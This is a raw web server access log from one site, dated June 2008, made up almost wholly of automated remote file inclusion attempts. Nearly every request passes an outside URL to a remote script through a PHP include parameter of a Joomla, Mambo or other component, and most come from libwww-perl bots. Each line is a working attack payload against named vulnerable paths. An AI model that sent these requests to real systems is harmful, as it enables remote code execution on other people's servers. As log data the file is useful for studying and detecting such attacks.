8.2.208.2 - - [29/Jun/2008:18:04:05 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
8.2.208.2 - - [29/Jun/2008:18:04:22 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:18:06:36 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.18.241.90 - - [29/Jun/2008:18:06:53 -0700] "GET /logs/access_080609.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.18.241.90 - - [29/Jun/2008:18:06:54 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.18.241.90 - - [29/Jun/2008:18:06:54 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:18:07:08 -0700] "GET /logs/access_080505.log//ashnews.php?pathtoashnews=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:18:07:09 -0700] "GET //ashnews.php?pathtoashnews=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:18:07:09 -0700] "GET /logs//ashnews.php?pathtoashnews=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:18:07:10 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:18:07:19 -0700] "GET /logs/access.log//components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:18:07:20 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:18:07:20 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
8.2.208.2 - - [29/Jun/2008:18:08:09 -0700] "GET /logs/access_080512.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
8.2.208.2 - - [29/Jun/2008:18:08:09 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
8.2.208.2 - - [29/Jun/2008:18:08:09 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
64.106.202.240 - - [29/Jun/2008:18:09:22 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
64.106.202.240 - - [29/Jun/2008:18:09:23 -0700] "GET //?mosConfig_absolute_path=http://210.60.110.116/board/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.mathstamps.com"
64.106.202.240 - - [29/Jun/2008:18:09:23 -0700] "GET /logs//?mosConfig_absolute_path=http://210.60.110.116/board/id.txt?? HTTP/1.1" 200 8236 "-" "libwww-perl/5.79" "www.mathstamps.com"
8.2.208.2 - - [29/Jun/2008:18:09:24 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:18:09:29 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
8.2.208.2 - - [29/Jun/2008:18:09:44 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
8.2.208.2 - - [29/Jun/2008:18:09:53 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:18:12:32 -0700] "GET /logs/access_080609.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:18:12:32 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:18:12:32 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:18:13:35 -0700] "GET //ashnews.php?pathtoashnews=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
193.202.88.113 - - [29/Jun/2008:18:13:44 -0700] "GET /logs/access.log//components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
193.202.88.113 - - [29/Jun/2008:18:13:45 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
193.202.88.113 - - [29/Jun/2008:18:13:45 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
193.202.88.113 - - [29/Jun/2008:18:14:49 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:18:16:05 -0700] "GET /logs/access_080505.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
201.6.118.215 - - [29/Jun/2008:18:17:32 -0700] "GET /logs/access_080602.log//include/admin.lib.inc.php?site_path=http://eskent.fileave/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
201.6.118.215 - - [29/Jun/2008:18:17:33 -0700] "GET //include/admin.lib.inc.php?site_path=http://eskent.fileave/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
201.6.118.215 - - [29/Jun/2008:18:17:33 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://eskent.fileave/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:18:18:35 -0700] "GET /logs/access_080609.log//newspublish/include.php?path%5Bdocroot%5D=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:18:18:36 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:18:18:37 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:18:18:59 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
217.20.163.130 - - [29/Jun/2008:18:22:11 -0700] "GET /logs/access_080505.log//newspublish/include.php?path%5Bdocroot%5D=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
74.53.196.178 - - [29/Jun/2008:18:22:30 -0700] "GET /help.php?css_path=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
69.62.196.11 - - [29/Jun/2008:18:23:36 -0700] "GET /logs/access_080609.log//newspublish/include.php?path%5Bdocroot%5D=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
69.62.196.11 - - [29/Jun/2008:18:23:36 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
69.62.196.11 - - [29/Jun/2008:18:23:36 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
61.222.167.228 - - [29/Jun/2008:18:25:04 -0700] "GET /logs/access_080609.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.222.167.228 - - [29/Jun/2008:18:25:12 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.222.167.228 - - [29/Jun/2008:18:25:25 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.79.246.241 - - [29/Jun/2008:18:26:19 -0700] "GET /includes/phpdig/includes/config.php?relative_script_path=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.mathstamps.com"
77.79.246.241 - - [29/Jun/2008:18:26:19 -0700] "GET /logs/includes/phpdig/includes/config.php?relative_script_path=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.mathstamps.com"
69.62.196.11 - - [29/Jun/2008:18:28:03 -0700] "GET /logs/access_080505.log//newspublish/include.php?path%5Bdocroot%5D=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
63.246.64.173 - - [29/Jun/2008:18:31:33 -0700] "GET /logs/access_080602.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
63.246.64.173 - - [29/Jun/2008:18:31:33 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
63.246.64.173 - - [29/Jun/2008:18:31:34 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
63.246.64.173 - - [29/Jun/2008:18:32:34 -0700] "GET /logs/access_080310.log//include/write.php?dir=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
63.246.64.173 - - [29/Jun/2008:18:32:34 -0700] "GET //include/write.php?dir=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
63.246.64.173 - - [29/Jun/2008:18:32:35 -0700] "GET /logs//include/write.php?dir=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
69.89.31.88 - - [29/Jun/2008:18:32:40 -0700] "GET /help.php?css_path=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:18:33:48 -0700] "GET //dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:18:34:21 -0700] "GET /logs/access_080609.log//dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:18:34:21 -0700] "GET //dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:18:34:33 -0700] "GET /logs/access_080421.log//dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:18:36:07 -0700] "GET /logs/access_080609.log//dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:18:36:07 -0700] "GET //dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:18:36:07 -0700] "GET /logs//dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.74.196.90 - - [29/Jun/2008:18:36:31 -0700] "GET /logs/access_080421.log//dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
63.246.64.173 - - [29/Jun/2008:18:36:46 -0700] "GET /logs/access_080310.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
193.202.88.113 - - [29/Jun/2008:18:36:53 -0700] "GET /logs/access_080609.log//dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
193.202.88.113 - - [29/Jun/2008:18:36:53 -0700] "GET //dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
61.222.167.228 - - [29/Jun/2008:18:37:02 -0700] "GET /logs/access_080609.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.222.167.228 - - [29/Jun/2008:18:37:03 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.222.167.228 - - [29/Jun/2008:18:37:04 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.82.215.11 - - [29/Jun/2008:18:37:11 -0700] "GET /logs/access_080609.log//dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.82.215.11 - - [29/Jun/2008:18:37:11 -0700] "GET //dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.82.215.11 - - [29/Jun/2008:18:37:12 -0700] "GET /logs//dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.202.88.113 - - [29/Jun/2008:18:37:30 -0700] "GET /logs/access_080421.log//dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
80.82.215.11 - - [29/Jun/2008:18:38:02 -0700] "GET /logs/access_080421.log//dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
203.177.42.133 - - [29/Jun/2008:18:39:34 -0700] "GET /logs/access_080609.log//init_basic.php?GALLERY_BASEDIR=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
195.90.15.14 - - [29/Jun/2008:18:41:53 -0700] "GET /logs/access_080421.log//dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.mathstamps.com"
195.90.15.14 - - [29/Jun/2008:18:41:54 -0700] "GET //dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.mathstamps.com"
195.90.15.14 - - [29/Jun/2008:18:41:54 -0700] "GET /logs//dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.mathstamps.com"
195.90.15.14 - - [29/Jun/2008:18:42:03 -0700] "GET /logs/access_080609.log//dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.mathstamps.com"
63.246.64.173 - - [29/Jun/2008:18:49:23 -0700] "GET /logs/access_080609.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
63.246.64.173 - - [29/Jun/2008:18:49:24 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
63.246.64.173 - - [29/Jun/2008:18:49:27 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
63.246.64.173 - - [29/Jun/2008:18:52:51 -0700] "GET /logs/access_080512.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
74.53.196.178 - - [29/Jun/2008:18:54:47 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
69.89.31.88 - - [29/Jun/2008:18:55:52 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
200.107.11.11 - - [29/Jun/2008:19:00:10 -0700] "GET /logs/access_080512.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.107.11.11 - - [29/Jun/2008:19:00:11 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.107.11.11 - - [29/Jun/2008:19:00:12 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.53.196.178 - - [29/Jun/2008:19:04:39 -0700] "GET /logs/access_080602.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.53.196.178 - - [29/Jun/2008:19:04:40 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
63.246.64.173 - - [29/Jun/2008:19:05:08 -0700] "GET /logs/access_080310.log//include/write.php?dir=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
63.246.64.173 - - [29/Jun/2008:19:05:11 -0700] "GET //include/write.php?dir=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.25.10.95 - - [29/Jun/2008:19:05:12 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://hate.tao21.de//files/files/contrd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.25.10.95 - - [29/Jun/2008:19:05:15 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://hate.tao21.de//files/files/contrd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.25.10.95 - - [29/Jun/2008:19:05:18 -0700] "GET /logs/access_080602.log//classes/adodbt/sql.php?classes_dir=http://hate.tao21.de//files/files/contrd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.25.10.95 - - [29/Jun/2008:19:05:19 -0700] "GET /logs/access_080421.log//classes/adodbt/sql.php?classes_dir=http://hate.tao21.de//files/files/contrd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.191.75.245 - - [29/Jun/2008:19:05:54 -0700] "GET /logs/access_080512.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
88.191.75.245 - - [29/Jun/2008:19:05:55 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.sonduzluk.com//administrator/components/com_joomla-visites/core/include/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
